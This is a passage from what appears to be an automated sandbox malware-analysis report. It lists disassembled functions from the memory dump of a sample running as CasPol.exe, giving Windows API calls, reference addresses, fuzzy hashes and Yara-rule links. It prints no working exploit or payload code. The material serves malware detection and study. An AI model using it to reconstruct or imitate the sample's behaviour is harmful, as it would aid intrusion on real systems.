                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2445788494-0
                                                                                                                                                                                  • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                  • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                  Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                  Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                  Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1381354015-0
                                                                                                                                                                                  • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                  Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                  Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                  Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                  • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                  • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                  Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2154303073-0
                                                                                                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                  Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3150196962-0
                                                                                                                                                                                  • Opcode ID: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                  • Opcode Fuzzy Hash: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                  Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$PointerRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3154509469-0
                                                                                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                  Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4232544981-0
                                                                                                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                  Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                  Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3859505661-0
                                                                                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                  Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                  Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                  Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                  Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                  Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                  Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                  Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                  Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
